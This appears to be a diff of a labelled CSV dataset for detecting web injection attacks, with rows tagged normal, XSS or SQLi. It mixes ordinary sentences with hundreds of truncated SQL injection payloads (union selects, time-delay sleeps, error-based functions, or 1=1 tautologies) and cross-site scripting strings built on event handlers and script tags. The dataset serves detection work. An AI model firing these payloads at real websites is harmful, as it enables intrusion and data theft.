-"{""id"":null,""name"":""Wormmon""}",0,normal,26938 -"-1351"" where 6968 = 6968 or 5684 = 8582",2,SQLi,13551 -<svg><select onload=alert(1)></select>,1,XSS,8416 -"<body draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,2194 -After Republicans won control of the House in the ,0,normal,26401 +"<frameset draggable=""true"" ondrag=""alert(1)"">test<",1,XSS,8705 +"<canvas oncontextmenu=""alert(1)"">test</canvas>",1,XSS,7269 +"and (select substring(@@version,3,1))='S'",2,SQLi,10347 +"1 and make_set ( 8403 = 8403,8899 ) -- rbxf",2,SQLi,18020 +1%' ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ),2,SQLi,20387 +-4248 where 3288 = 3288 or 4144 = ( select upper (,2,SQLi,13775 +"-9371' ) union all select 5900,5900,5900#",2,SQLi,21171 +"<fieldset ondblclick=""alert(1)"">test</fieldset>",1,XSS,6941 +"<noembed draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,6973 +-5820' ) ) as lkik where 4044 = 4044 or 7156 = 919,2,SQLi,20312 +<picture onpointerleave=alert(1)>XSS</picture>,1,XSS,4161 +I need to select a movie for our movie night.,0,normal,23836 +"{""id"":null,""firstName"":""Kevin"",""lastName"":""Tan"",""s",0,normal,26935 +"-4764"" ) ) or 2724 in ( ( char ( 113 ) +char ( 113",2,SQLi,13553 +"<SCRIPT ""a='>'"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,8418 +<dialog onfocusout=alert(1) tabindex=1 id=x></dial,1,XSS,2195 +Affiliated groups may select two members to vote a,0,normal,26403 "&lt;OBJECT TYPE=\""text/x-scriptlet\"" DATA=\""http&#",1,XSS,1016 -"<datalist oncopy=""alert(1)"" contenteditable>test</",1,XSS,5125 -Can you help me decide where to travel next?,0,normal,23803 -Let's find out where the historical site is.,0,normal,23794 -The site has an option to select Portrait Photogra,0,normal,25374 -1' ) order by 1#,2,SQLi,19256 +"<body onpaste=""alert(1)"" contenteditable>test</bod",1,XSS,5127 +Where's the perfect place to enjoy nature?,0,normal,23805 +I need to decide where to go for a weekend trip.,0,normal,23796 +The service was available only to users who subscr,0,normal,25376 +"1' where 7190 = 7190 and 8148 = like ( 'abcdefg',u",2,SQLi,19258 <marquee width=1 loop=1 onbounce=alert(1)>XSS</mar,1,XSS,10 -"or 0=0 #""",2,SQLi,10137 -1 or 7552 = ( select count ( * ) from rdb$fields a,2,SQLi,18223 -<legend onpointerleave=alert(1)>XSS</legend>,1,XSS,4805 -"1"" ) where 2839 = 2839 and 5556 = ( select count (",2,SQLi,16640 -Where's your SQL aid?,0,normal,23411 -<svg><noscript onload=alert(1)></noscript>,1,XSS,5714 -"1 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ",2,SQLi,12678 -"-4210"" ) where 2679 = 2679 or 4493 = utl_inaddr.ge",2,SQLi,19709 -Select the best course of action.,0,normal,24099 -"<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/S",1,XSS,1582 -"1%"" union all select null,null,null,null,null,null",2,SQLi,17309 -"<frameset onkeydown=""alert(1)"" contenteditable>tes",1,XSS,2780 -She'll select dessert.,0,normal,24276 -select * from myfile;copy myfile to /tmp/test;,2,SQLi,22517 -"1' ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and (",2,SQLi,13217 -<style>:target {transform: rotate(180deg);}</style,1,XSS,5321 -<applet id=x tabindex=1 onfocus=alert(1)></applet>,1,XSS,7313 -Where's the remote?,0,normal,23487 -"-7101 ) ) ) union all select 4587,4587,4587,4587,4",2,SQLi,14838 -"<tfoot oncut=""alert(1)"" contenteditable>test</tfoo",1,XSS,6043 -1' ) and 2564 = 3234--,2,SQLi,20160 -"<spacer onkeyup=""alert(1)"" contenteditable>test</s",1,XSS,4836 -"<image oncut=""alert(1)"" contenteditable>test</imag",1,XSS,4965 +char%4039%41%2b%40SELECT,2,SQLi,10139 +1' ) as njfg where 6392 = 6392 waitfor delay '0:0:,2,SQLi,18225 +<rp id=x tabindex=1 onfocus=alert(1)></rp>,1,XSS,4807 +"1"" ) and 8635 = ( select count ( * ) from generate",2,SQLi,16642 +Where's your SQL advice?,0,normal,23413 +"<bdo onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,5716 +"1"" ) where 3122 = 3122 and sleep ( 5 ) #",2,SQLi,12680 +"1"" ) ) and elt ( 3785 = 9386,9386 ) and ( ( ""inwa""",2,SQLi,19711 +Select a scent for your perfume.,0,normal,24101 +"<;BASE HREF="";javascript:alert(';XSS';);//"";>;",1,XSS,1583 +1' in boolean mode ) waitfor delay '0:0:5'--,2,SQLi,17311 +"<style>@keyframes x{}</style><a style=""animation-n",1,XSS,2781 +Select the best restaurant.,0,normal,24278 +1/*!1111'*/,2,SQLi,22519 +1 ) ) ) and 6510 = ( select count ( * ) from sysus,2,SQLi,13219 +"<hgroup oncopy=""alert(1)"" contenteditable>test</hg",1,XSS,5323 +"<ul onmouseout=""alert(1)"">test</ul>",1,XSS,7315 +Where's your house?,0,normal,23489 +1'|| ( select 'xqqp' where 3007 = 3007 and ( selec,2,SQLi,14840 +<style>@keyframes slidein {}</style><select style=,1,XSS,6045 +1'|| ( select 'lkmh' where 7659 = 7659,2,SQLi,20162 +"<tbody onmouseleave=""alert(1)"">test</tbody>",1,XSS,4838 +<spacer onblur=alert(1) tabindex=1 id=x></spacer><,1,XSS,4967 "<a href=""\x1Cjavascript:javascript:alert(1)"" id=""f",1,XSS,540 -<audio id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,7484 -"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,19130 -<bdi onfocusout=alert(1) tabindex=1 id=x></bdi><in,1,XSS,3720 -minute,0,normal,23204 -"-3756' ) union all select 1034,1034,1034--",2,SQLi,13660 -<x contenteditable oninput=alert(1)>input here!,1,XSS,9338 -1%' ) ) and ( select 2* ( if ( ( select * from ( s,2,SQLi,20853 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7486 +"1"" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) |",2,SQLi,19132 +<h1 onpointerout=alert(1)>XSS</h1>,1,XSS,3722 +mid,0,normal,23206 +"1"" ) ) ) or ( select 2* ( if ( ( select * from ( s",2,SQLi,13662 +<x contenteditable onkeypress=alert(1)>press any k,1,XSS,9340 +1 or sleep ( 5 ) -- nrzf,2,SQLi,20855 "<img src\x12=x onerror=""javascript:alert(1)"">",1,XSS,668 -Let's choose a recipe for Sunday brunch.,0,normal,23960 -Select your aspiration.,0,normal,24934 -"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,21448 -"and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11024 -#ERROR!,2,SQLi,10976 -"\'><SCRIPT>alert(String.fromCharCode(88,83,83))</S",1,XSS,1354 -"1%"" ) and 9660 = ( select count ( * ) from all_use",2,SQLi,13324 -"<style>@keyframes x{}</style><td style=""animation-",1,XSS,7115 -Select coffee.,0,normal,24505 -"<details onbeforepaste=""alert(1)"" contenteditable>",1,XSS,8663 -1' ) ) as vnwn where 8774 = 8774 and ( select * fr,2,SQLi,19088 -"<blink draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,3331 -<strike onpointerup=alert(1)>XSS</strike>,1,XSS,8054 -"select * from users where id = 1 or ""._"" or 1 = 1 ",2,SQLi,11830 -<button onBlur=javascript:alert(1)>,1,XSS,9589 -"-3749"" or elt ( 1032 = 1032,3623 ) and ""mzrw"" = ""m",2,SQLi,19969 -"{""id"":null,""firstName"":""Feng"",""lastName"":""Sheng"",""",0,normal,26866 -<multicol id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,5646 -"-3063%"" ) ) ) or 4144 = ( select upper ( xmltype (",2,SQLi,19761 -1'|| ( select 'jscc' from dual where 3266 = 3266 a,2,SQLi,17641 -"<br draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,6191 -"1 ) and 2388 = benchmark ( 5000000,md5 ( 0x6d45715",2,SQLi,15762 -"x' and members.email is NULL, --",2,SQLi,11705 -( select 2* ( if ( ( select * from ( select concat,2,SQLi,13844 -Once you select which bank account will receive yo,0,normal,25827 -"1"" ) as pkkx where 6716 = 6716 and updatexml ( 339",2,SQLi,21733 -#ERROR!,2,SQLi,11004 -"-1084' ) union all select 2634,2634,2634,2634,2634",2,SQLi,20560 -"<slot onmouseup=""alert(1)"">test</slot>",1,XSS,4911 -<dd id=x tabindex=1 onbeforeactivate=alert(1)></dd,1,XSS,1853 -Order a Hawaiian pizza.,0,normal,22701 -1 and 8189 = ( select count ( * ) from sysibm.syst,2,SQLi,12973 +I need to select the appropriate ingredients for t,0,normal,23962 +Select your wish.,0,normal,24936 +1'|| ( select 'cgup' from dual where 5383 = 5383 w,2,SQLi,21450 +""" and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11026 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10978 +); alert('xss'); var x=',1,XSS,1355 +"1' in boolean mode ) and make_set ( 7804 = 3315,33",2,SQLi,13326 +<picture onpointerdown=alert(1)>XSS</picture>,1,XSS,7117 +Select juice.,0,normal,24507 +"<style>@keyframes x{}</style><xmp style=""animation",1,XSS,8665 +-6566' ) as kggb where 9768 = 9768 order by 1--,2,SQLi,19090 +"<table oncut=""alert(1)"" contenteditable>test</tabl",1,XSS,3333 +"<dfn oncontextmenu=""alert(1)"">test</dfn>",1,XSS,8056 +union ( select @@version ) --,2,SQLi,11832 +<button onCellChange=javascript:alert(1)>,1,XSS,9591 +"1' ) and make_set ( 7187 = 4625,4625 ) and ( 'diai",2,SQLi,19971 +"{""id"":null,""firstName"":""James"",""lastName"":""Tan"",""a",0,normal,26863 +"<td onkeypress=""alert(1)"" contenteditable>test</td",1,XSS,5648 +"1%"" ) union all select null,null,null#",2,SQLi,19763 +"-8144' ) where 1691 = 1691 or elt ( 7246 = 7816,78",2,SQLi,17643 +<del id=x tabindex=1 ondeactivate=alert(1)></del><,1,XSS,6193 +"1"" ) ) as ccjk where 1932 = 1932 or 8315 = ( selec",2,SQLi,15764 +""" ) or pg_sleep ( __TIME__ ) --",2,SQLi,11707 +-7199' or 4144 = ( select upper ( xmltype ( chr ( ,2,SQLi,13846 +"Once you select Grayscale, your screen will immedi",0,normal,25829 +1' ) ) as zffq where 9572 = 9572 or 6793 = ( selec,2,SQLi,21735 +#ERROR!,2,SQLi,11006 +-5217 where 3620 = 3620 or 3440 = cast ( ( chr ( 1,2,SQLi,20562 +<keygen onpointerleave=alert(1)>XSS</keygen>,1,XSS,4913 +<ruby onblur=alert(1) tabindex=1 id=x></ruby><inpu,1,XSS,1854 +Update your status message.,0,normal,22703 +"1"" where 5334 = 5334 or exp ( ~ ( select * from ( ",2,SQLi,12975 "{""id"":null,""firstName"":""Hui Ping"",""lastName"":""Wong",0,normal,27420 -<bdo id=x tabindex=1 onfocus=alert(1)></bdo>,1,XSS,2106 --6081 where 3681 = 3681 or 2603 = 3138--,2,SQLi,16518 -"1', ( select ( case when ( 6948 = 4654 ) then 1 el",2,SQLi,13429 -<noscript onpointerenter=alert(1)>XSS</noscript>,1,XSS,5030 -"-8888%' ) union all select 5312,5312,5312,5312,531",2,SQLi,17313 +<svg id=x tabindex=1 onactivate=alert(1)></svg>,1,XSS,2107 +select ( case when ( 5203 = 6330 ) then 5203 else ,2,SQLi,16520 +1'|| ( select 'glec' from dual where 4846 = 4846,2,SQLi,13431 +<noembed onpointerover=alert(1)>XSS</noembed>,1,XSS,5032 +-7230' ) or 2724 in ( ( char ( 113 ) +char ( 113 ),2,SQLi,17315 "<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>');",1,XSS,824 -Where can I select a wine for the dinner party?,0,normal,23961 -"<body onload=""document.vulnerable=true;"">",1,XSS,1532 -"<IMG SRC=x oncopy=""alert(String.fromCharCode(88,83",1,XSS,1215 +She carefully selected her words for the speech.,0,normal,23963 +"<div style=""background-image: url(javascript:docum",1,XSS,1533 +"<IMG SRC=x oncut=""alert(String.fromCharCode(88,83,",1,XSS,1216 "<a href=""\xE2\x80\x82javascript:javascript:alert(1",1,XSS,505 -1%' ) ) or ( select * from ( select ( sleep ( 5 ) ,2,SQLi,14684 -declare @q nvarchar (200) select @q = 0x7700610069,2,SQLi,10189 -<sup id=x tabindex=1 onbeforeactivate=alert(1)></s,1,XSS,6531 -1%' ) and char ( 107 ) ||char ( 121 ) ||char ( 97 ,2,SQLi,19457 -")) or sleep(__TIME__)=""",2,SQLi,10151 -<button onAfterPrint=javascript:alert(1)>,1,XSS,9577 -The company began testing pickup at select locatio,0,normal,25471 -"1', ( select ( case when ( 6560 = 2813 ) then 1 el",2,SQLi,13117 -Select your develop.,0,normal,25032 -She updated her profile.,0,normal,23004 -select a new person to honor.,0,normal,25658 -"<ins draggable=""true"" ondrag=""alert(1)"">test</ins>",1,XSS,3710 -"{""id"":null,""firstName"":""Eng Joo"",""lastName"":""Pok"",",0,normal,27056 --8878' in boolean mode ) union all select 7785#,2,SQLi,21234 -<bdi onpointerenter=alert(1)>XSS</bdi>,1,XSS,4749 -1' ) ) ) and 7533 = 7533 and ( ( ( 'txex' = 'txex,2,SQLi,20653 -"select * from users where id = 1 or ""; ( "" or 1 = ",2,SQLi,11715 -1'+ ( select pagd where 2484 = 2484,2,SQLi,15486 +1 ) ) as rual where 4649 = 4649 and ( select 2* ( ,2,SQLi,14686 +declare @q nvarchar (200) 0x730065006c006500630074,2,SQLi,10191 +"<legend draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,6533 +"1"" ) where 1700 = 1700 union all select null,null,",2,SQLi,19459 +hi' or 1=1 --,2,SQLi,10153 +<button onBeforeActivate=javascript:alert(1)>,1,XSS,9579 +"The commissioners, ten in number, were directed to",0,normal,25473 +"1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113",2,SQLi,13119 +Select your evolve.,0,normal,25034 +They joined the yoga class.,0,normal,23006 +Select a fit and a brand that you trust and go wit,0,normal,25660 +"<dfn draggable=""true"" ondragend=""alert(1)"">test</d",1,XSS,3712 +"{""id"":null,""firstName"":""Jeff"",""lastName"":""Toh"",""sp",0,normal,27053 +-2797' ) ) ) union all select 5711#,2,SQLi,21236 +"<i onkeyup=""alert(1)"" contenteditable>test</i>",1,XSS,4751 +1' ) ) as gqzy where 2312 = 2312 or 5286 = ( selec,2,SQLi,20655 +"select * from users where id = 1 or "";_"" or 1 = 1 ",2,SQLi,11717 +1 and 3707 = ( select count ( * ) from sysibm.syst,2,SQLi,15488 "{""id"":null,""firstName"":""Cecilia"",""lastName"":""Chng""",0,normal,27454 -"Thus Mr Papillon considered that, while the teachi",0,normal,25290 -1 ) as nioj where 9703 = 9703,2,SQLi,20571 -"{""id"":null,""firstName"":""Evon"",""lastName"":""Choong"",",0,normal,26791 -"<colgroup onbeforecut=""alert(1)"" contenteditable>t",1,XSS,5302 -"-6357"" ) union all select 9767,9767,9767,9767,9767",2,SQLi,19308 -"<wbr onmousedown=""alert(1)"">test</wbr>",1,XSS,6589 -"<object onmousedown=""alert(1)"">test</object>",1,XSS,1811 -select ( case when ( 3859 = 6938 ) then 3859 else ,2,SQLi,19871 -I'm considering where to enjoy a meal.,0,normal,23804 -<area id=x tabindex=1 ondeactivate=alert(1)></area,1,XSS,3142 -"Additionally, you can save up to 65% on select sal",0,normal,26404 -Samsung EVO Select microSDXC (512 GB) — £86.49 (li,0,normal,25732 -></iframe><script>alert(123)</script>,1,XSS,1325 -<plaintext onpointermove=alert(1)>XSS</plaintext>,1,XSS,4313 -"<menuitem ondblclick=""alert(1)"">test</menuitem>",1,XSS,7495 -"You can shop select featured deals, and take an ex",0,normal,25087 -"Currently, you can take $100-$79.993 off select Pl",0,normal,26257 -"<meta onpaste=""alert(1)"" contenteditable>test</met",1,XSS,8692 -"{""id"":null,""name"":""Seadramon""}",0,normal,26942 -A range of intelligence will be used to select the,0,normal,26433 -<button onBeforeCut=javascript:alert(1)>,1,XSS,9581 -1' ) and 6414 = ( select count ( * ) from rdb$fiel,2,SQLi,13808 -1'+ ( select vvet where 5221 = 5221 and exp ( ~ ( ,2,SQLi,21926 -Join the team for lunch.,0,normal,22557 -"-6381%"" ) ) ) union all select 1503,1503,1503,1503",2,SQLi,17925 -Owners of select Chevy models will soon be able to,0,normal,25794 -1 where 5925 = 5925 and 8189 = ( select count ( * ,2,SQLi,19066 +Those that opened after 2010 may select half their,0,normal,25292 +1' ) ) ) and 6414 = ( select count ( * ) from rdb$,2,SQLi,20573 +"{""id"":null,""name"":""Tangela""}",0,normal,26793 +<abbr id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,5304 +1' ) ) and 6537 = dbms_pipe.receive_message ( chr ,2,SQLi,19310 +<progress id=x tabindex=1 onfocusin=alert(1)></pro,1,XSS,6591 +"<area onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,1812 +"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,19873 +Where's the best place to indulge in desserts?,0,normal,23806 +<mark id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,3144 +"Additionally, members will be able to find select ",0,normal,26406 +Samsung EVO Select 256GB U3 MicroSDXC Memory Card ,0,normal,25734 +"<body onLoad=while(true) alert('XSS');"">",1,XSS,1326 +"<dt draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,4315 +<figcaption onpointerout=alert(1)>XSS</figcaption>,1,XSS,7497 +You can score up to 25 percent off select furnitur,0,normal,25089 +Current / Elliott 25% off your purchase; select ex,0,normal,26259 +"<code oncontextmenu=""alert(1)"">test</code>",1,XSS,8694 +"{""id"":null,""firstName"":""Anthony"",""lastName"":""Chern",0,normal,26939 +A party initiating proceedings could select any Br,0,normal,26435 +<button onBeforeEditFocus=javascript:alert(1)>,1,XSS,9583 +"end and ( ( ( ""zpii"" like ""zpii",2,SQLi,13810 +1' ) as gxfu where 9676 = 9676,2,SQLi,21928 +Delete the spam emails.,0,normal,22559 +1'+ ( select 'rguk' where 6019 = 6019 union all se,2,SQLi,17927 +"Outside of that promotion, the Select tier is usua",0,normal,25796 +"1 ) or updatexml ( 1808,concat ( 0x2e,0x7171706a71",2,SQLi,19068 "{""id"":null,""name"":""Quilladin""}",0,normal,27458 -<keygen id=x onfocus=alert(1)>,1,XSS,6314 -"1' ) ) union all select null,null,null,null,null#",2,SQLi,17576 -1' ) ) as iipj where 6560 = 6560,2,SQLi,13965 -"1%"" ) and 6537 = dbms_pipe.receive_message ( chr (",2,SQLi,21678 -"<img src=""blah>"" onmouseover=""document.vulnerable=",1,XSS,1543 -select * from users where id = 1. <@ or 1 = 1 -- 1,2,SQLi,11494 -admin' or 1 = 1/*,2,SQLi,11517 -<acronym id=x tabindex=1 onactivate=alert(1)></acr,1,XSS,7057 -<textarea oncopy=alert(1) autofocus>XSS</textarea>,1,XSS,2540 --7032' ) as xmmm where 5635 = 5635 union all selec,2,SQLi,17338 -Where's the dentist's office?,0,normal,23626 -"select sleep ( 5 ) and ( ""tlbj"" like ""tlbj",2,SQLi,15369 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6732 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4847 -<img id=x tabindex=1 onfocus=alert(1)></img>,1,XSS,6802 -Carefully select your honeymoon itinerary.,0,normal,24395 -<time onpointerleave=alert(1)>XSS</time>,1,XSS,4331 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8925 -"<head onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5335 -I'm thinking of where to spend my evening.,0,normal,23715 -<x ondblclick=alert(1)>double click this!,1,XSS,9349 -<style>@keyframes slidein {}</style><command style,1,XSS,4730 -"She asked, ""When is our dinner date?""",0,normal,22926 -) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11175 -1'+ ( select 'yyyn' where 5395 = 5395,2,SQLi,21690 -1' ) ) or 1022 = ( select count ( * ) from all_use,2,SQLi,21546 -Select the best ingredients for baking.,0,normal,24245 -select ( case when ( 5152 = 7853 ) then 5152 else ,2,SQLi,18541 -&lt;,1,XSS,1063 -<script>for((i)in(self))eval(i)(1)</script>,1,XSS,1168 --9072 ) as saot where 2278 = 2278 order by 1#,2,SQLi,20021 -"<plaintext onpaste=""alert(1)"" contenteditable>test",1,XSS,7652 --3867%' ) or 3084 = 5633 and ( '%' = ',2,SQLi,21973 -grant connect to name; grant resource to name;,2,SQLi,11131 -Where's the planetarium?,0,normal,23577 -"<i onbeforecopy=""alert(1)"" contenteditable>test</i",1,XSS,4492 -Where's the tarot card reader?,0,normal,23651 -1 where 2238 = 2238,2,SQLi,21365 -"<IMG DYNSRC=""javascript:alert('')"">",1,XSS,8336 -"<command ondblclick=""alert(1)"">test</command>",1,XSS,5487 --5708 where 3134 = 3134 or 5903 = ( 'qqpjq'|| ( se,2,SQLi,21331 -1 ) as cnpv where 4902 = 4902 and elt ( 1210 = 121,2,SQLi,19167 -"1"" and 6969 = ( select 6969 from pg_sleep ( 5 ) )",2,SQLi,17102 -"After you've filled in the details, select ""Place ",0,normal,26396 -<footer id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,2503 -"<style>@keyframes x{}</style><samp style=""animatio",1,XSS,4361 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4172 -You should select carefully.,0,normal,24467 -"{""id"":null,""firstName"":""Tan"",""lastName"":""Elicia"",""",0,normal,27292 -"-2759%"" ) ) or 7769 = 1249#",2,SQLi,16780 --3362' where 6567 = 6567 or 1 group by concat ( 0x,2,SQLi,13924 --5225' ) ) as zats where 5629 = 5629 union all sel,2,SQLi,14513 -<details id=x tabindex=1 onfocus=alert(1)></detail,1,XSS,7187 +"<span oncontextmenu=""alert(1)"">test</span>",1,XSS,6316 +1 ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||c,2,SQLi,17578 +1' or ( select * from ( select ( sleep ( 5 ) ) ) y,2,SQLi,13967 +-6203' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlha,2,SQLi,21680 +"<xml src=""javascript:document.vulnerable=true;"">",1,XSS,1544 +"hi' or 'x' = 'x',",2,SQLi,11496 +select * from users where id = 1 union select .1$_,2,SQLi,11519 +"<bdi onmouseover=""alert(1)"">test</bdi>",1,XSS,7059 +"<select onbeforepaste=""alert(1)"" contenteditable>t",1,XSS,2541 +1 where 5859 = 5859 or 8315 = ( select count ( * ),2,SQLi,17340 +Where's the optometrist?,0,normal,23628 +"1"" ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,15371 +"<progress onbeforecut=""alert(1)"" contenteditable>t",1,XSS,6734 +"<applet onmouseout=""alert(1)"">test</applet>",1,XSS,4849 +<acronym id=x tabindex=1 onfocus=alert(1)></acrony,1,XSS,6804 +Randomly select a honeymoon song.,0,normal,24397 +<style>:target {color:red;}</style><spacer id=x st,1,XSS,4333 +"<slot onmouseover=""alert(1)"">test</slot>",1,XSS,8927 +<noscript onfocusout=alert(1) tabindex=1 id=x></no,1,XSS,5337 +I'll select a gift for my friend's birthday.,0,normal,23717 +<x onmousedown=alert(1)>click this!,1,XSS,9351 +"<listing onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,4732 +Select the perfect gift for your friend's birthday,0,normal,22928 +) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) AN,2,SQLi,11177 +"1%"" and 3754 = ( select upper ( xmltype ( chr ( 60",2,SQLi,21692 +"1' ) ) ) union all select null,null,null,null,null",2,SQLi,21548 +Select a yoga pose to practice.,0,normal,24247 +1 or 5356 = ( select count ( * ) from sysusers as ,2,SQLi,18543 +&#60,1,XSS,1064 +<scr<script>ipt>alert(1)</scr</script>ipt><scr<scr,1,XSS,1169 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20023 +"<rp onpaste=""alert(1)"" contenteditable>test</rp>",1,XSS,7654 +-7565%' ) or 2724 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,21975 +"; if not(substring((select @@version),25,1) <> 5) ",2,SQLi,11133 +Where's the exhibit?,0,normal,23579 +<image3 onpointerout=alert(1)>XSS</image3>,1,XSS,4494 +Where's the medium?,0,normal,23653 +1 ) ) as oywa where 7951 = 7951 union all select n,2,SQLi,21367 +<b onpointerout=alert(1)>XSS</b>,1,XSS,8338 +<title onpointerleave=alert(1)>XSS</title>,1,XSS,5489 +"-7869%' union all select 2406,2406,2406,2406,2406,",2,SQLi,21333 +"1 ) ) and 8148 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,19169 +1 ) as tkkn where 7832 = 7832 ( select ( case when,2,SQLi,17104 +"After uploading, right click and select ""Open with",0,normal,26398 +"STYLE=""width: expression(alert(''))",1,XSS,2504 +"<sub onmouseover=""alert(1)"">test</sub>",1,XSS,4363 +<svg><ins onload=alert(1)></ins>,1,XSS,4174 +They select the winner.,0,normal,24469 +"{""id"":null,""name"":""VenusaurMega Venusaur""}",0,normal,27291 +1 ) as nkjo where 8462 = 8462 union all select nul,2,SQLi,16782 +"1"" and 9198 = 9198--",2,SQLi,13926 +"1%"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) |",2,SQLi,14515 +"<ol onmousemove=""alert(1)"">test</ol>",1,XSS,7189 <style>*[{}@import'%(css)s?]</style>X,1,XSS,699 -"( extractvalue ( 1759,concat ( 0x5c,0x7171706a71, ",2,SQLi,20877 -"-6580' ) union all select 9950,9950,9950,9950,9950",2,SQLi,17750 -"{""id"":null,""firstName"":""Sujith"",""lastName"":""Wijera",0,normal,26976 -"-6626%"" ) or 1744 = 5292 and ( ""%"" = """,2,SQLi,14192 -<input4 onpointermove=alert(1)>XSS</input4>,1,XSS,8788 -select case when 4176 = 6138 then 1 else null end-,2,SQLi,14398 -"-4605"" ) union all select 8542,8542,8542,8542,8542",2,SQLi,12145 --6165%' ) ) union all select 5384#,2,SQLi,13585 -"-3609"" ) ) as fzyp where 9474 = 9474 or 9323 = 932",2,SQLi,22302 -select ( case when ( 4769 = 4769 ) then 4769 else ,2,SQLi,21353 -"<s draggable=""true"" ondrag=""alert(1)"">test</s>",1,XSS,2915 -1' ) ) as gfzb where 7904 = 7904,2,SQLi,14553 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10519 -"<font onmouseenter=""alert(1)"">test</font>",1,XSS,5645 -"1%"" ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99",2,SQLi,20151 -"<li onmouseenter=""alert(1)"">test</li>",1,XSS,3441 -select * from users where id = '1' + ( \. ) union ,2,SQLi,12044 -<style id=x tabindex=1 onfocus=alert(1)></style>,1,XSS,7358 -lower,0,normal,23191 -Could be everyone or just a select few family memb,0,normal,26264 -"<noscript draggable=""true"" ondragstart=""alert(1)"">",1,XSS,2144 -"<code draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,5105 -"<acronym onmouseout=""alert(1)"">test</acronym>",1,XSS,5074 -"1%"" ) union all select null,null,null,null,null#",2,SQLi,17956 -1' and 6621 = 4681--,2,SQLi,20464 -"-5934' union all select 6096,6096,6096,6096,6096#",2,SQLi,17507 -1 ) ) as rcon where 8190 = 8190 or 5286 = ( select,2,SQLi,16049 -1' ) ) or 7427 = dbms_pipe.receive_message ( chr (,2,SQLi,19171 -1 ) where 2781 = 2781 or 5286 = ( select count ( *,2,SQLi,14528 -"<dfn onmousemove=""alert(1)"">test</dfn>",1,XSS,2968 -1%' ) ) ) or char ( 75 ) ||char ( 70 ) ||char ( 99,2,SQLi,18889 -<strong onpointerout=alert(1)>XSS</strong>,1,XSS,5989 -"select * from users where id = 1 or 1#""{ union sel",2,SQLi,11658 -"To untag someone from a post, select the ""More"" bu",0,normal,25252 -Where's the guesthouse?,0,normal,23549 +1%' ) ) ) or sleep ( 5 ) #,2,SQLi,20879 +-1485' ) or ( 2056 = 4008 ) *4008 and ( 'vphj' = ',2,SQLi,17752 +"{""id"":null,""name"":""memory""}",0,normal,26973 +1 ) where 7552 = 7552 order by 1#,2,SQLi,14194 +"<frameset draggable=""true"" ondragstart=""alert(1)"">",1,XSS,8790 +"-3461"" ) ) union all select 6342,6342,6342,6342,63",2,SQLi,14400 +select case when 6558 = 4327 then 1 else null end-,2,SQLi,12147 +"1' ) ) ) union all select null,null,null,null,null",2,SQLi,13587 +1' ) ) or 5356 = ( select count ( * ) from sysuser,2,SQLi,22304 +"1"" ) as eoer where 8667 = 8667 or 6793 = ( select ",2,SQLi,21355 +"<plaintext onmouseover=""alert(1)"">test</plaintext>",1,XSS,2916 +"-9779' ) ) or make_set ( 9354 = 9354,7185 ) and ( ",2,SQLi,14555 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10521 +"<body onresize=""alert(1)"">",1,XSS,5647 +"-4932%"" ) ) or ( 3076 = 5927 ) *5927 and ( ( ""%"" =",2,SQLi,20153 +<menuitem id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,3443 +and 1 = 0 ) union all,2,SQLi,12046 +<keygen id=x tabindex=1 onactivate=alert(1)></keyg,1,XSS,7360 +substring,0,normal,23193 +"Contrary to the intent, the benefits skewed toward",0,normal,26266 +"<tfoot onkeypress=""alert(1)"" contenteditable>test<",1,XSS,2145 +<tt id=x tabindex=1 onbeforedeactivate=alert(1)></,1,XSS,5107 +"<menu onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5076 +"-2247' ) union all select 1202,1202,1202,1202,1202",2,SQLi,17958 +1%' ) ) or 4915 = ( select count ( * ) from domain,2,SQLi,20466 +1' and 8189 = ( select count ( * ) from sysibm.sys,2,SQLi,17509 +"1%"" ) ) ) and 4241 = convert ( int, ( select char ",2,SQLi,16051 +1' ) as jlae where 1650 = 